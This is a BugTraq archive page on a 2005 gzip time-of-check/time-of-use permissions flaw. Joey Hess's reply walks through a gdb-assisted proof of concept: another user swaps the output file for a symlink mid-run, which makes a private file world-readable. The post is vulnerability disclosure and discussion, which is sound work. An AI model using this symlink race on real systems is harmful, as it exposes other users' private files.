BugTraq
gzip TOCTOU file-permissions vulnerability Apr 04 2005 07:57PM
Imran Ghory (imranghory gmail com) (1 replies)
Re: gzip TOCTOU file-permissions vulnerability Apr 12 2005 11:47AM
Martin Pitt (martin pitt canonical com) (4 replies)
Re: gzip TOCTOU file-permissions vulnerability Apr 14 2005 01:14AM
Derek Martin (code pizzashack org)
Re: gzip TOCTOU file-permissions vulnerability Apr 13 2005 03:40PM
Joey Hess (joeyh debian org) (2 replies)
Martin Pitt wrote:
> Of course the file can be removed by other users after gunzip has
> finished, but that is not a gzip bug, but the result of the really
> dumb idea to have a group/world-writeable directory without the sticky
> bit.

It may be really dumb, but it's pretty common practice too.
Group-writable directories are often made setgid but I've never seen one
made sticky. There's probably a lot of documentation that presents this
as best practice if you trust your group members with access to files in
the directory, and likely none of it mentions this kind of security issue.

Just a few examples within the Debian project (since this is CCed to the
Debian bts):

joeyh@haydn:/var/lib/gforge/chroot/home/groups/d-i/htdocs>ls -ld .
drwxrwsr-x 4 dummy d-i 4096 Jan 18 12:51 ./

joeyh@gluck:/org/cdimage.debian.org/www>ls -ld .
drwxrwsr-x 4 manty debian-c 4096 Apr 7 09:11 ./

joeyh@merkel:/org/bugs.debian.org/spool>ls -ld .
drwxrwsr-x 4 debbugs debbugs 4096 Apr 13 09:19 ./

(gzip is not typically ran in any of these directories AFAIK, FWIW).

> Maybe I understood you wrong, could you please give a small test case
> which describes the vulnerability exactly?

I'm a wimp, so I will use gdb instead of writing some real exploit to
win the race.

joey@dragon:~/tmp/gzip-1.3.5>chmod 777 .
joey@dragon:~/tmp/gzip-1.3.5>echo secret > ~/secret
joey@dragon:~/tmp/gzip-1.3.5>chmod 400 ~/secret
joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret
-r-------- 1 joey joey 7 Apr 13 11:32 /home/joey/secret
joey@dragon:~/tmp/gzip-1.3.5>gdb ./gzip
GNU gdb 6.3-debian
Copyright 2004 Free Software Foundation, Inc.
This GDB was configured as "i386-linux"...Using host libthread_db library "/lib/libthread_db.so.1".

(gdb) b copy_stat
Breakpoint 1 at 0x804ca19: file gzip.c, line 1725.
(gdb) run -9 COPYING
Starting program: /home/joey/tmp/gzip-1.3.5/gzip -9 COPYING

Breakpoint 1, copy_stat (ifstat=0x0) at gzip.c:1725
1725 if (decompress && time_stamp != 0 && ifstat->st_mtime != time_stamp) {
(gdb)
zsh: suspended gdb ./gzip
joey@dragon:~/tmp/gzip-1.3.5>ls -l COPYING.gz
-rw------- 1 joey joey 6853 Apr 13 11:28 COPYING.gz
joey@dragon:~/tmp/gzip-1.3.5>sudo su nobody
Password:
sh-3.00$ ln -s ~joey/secret COPYING.gz
sh-3.00$ cat COPYING.gz
cat: COPYING.gz: Permission denied
dragon%
zsh: exit 1 sudo su nobody
joey@dragon:~/tmp/gzip-1.3.5>fg
[2] - continued gdb ./gzip
c
Continuing.

Program exited normally.
(gdb) quit
joey@dragon:~/tmp/gzip-1.3.5>ls -l ~/secret
-r--r--r-- 1 joey joey 7 Jan 12 1999 /home/joey/secret

--
see shy jo

[ reply ]
Re: gzip TOCTOU file-permissions vulnerability Apr 14 2005 06:36AM
Theodor Milkov (zimage icdsoft com)
Re: gzip TOCTOU file-permissions vulnerability Apr 14 2005 12:29AM
psz maths usyd edu au
Re: gzip TOCTOU file-permissions vulnerability Apr 13 2005 03:00PM
Peter J. Holzer (hjp wsr ac at)
Re: gzip TOCTOU file-permissions vulnerability Apr 13 2005 02:49PM
Derek Martin (code pizzashack org)


 

Privacy Statement
Copyright 2010, SecurityFocus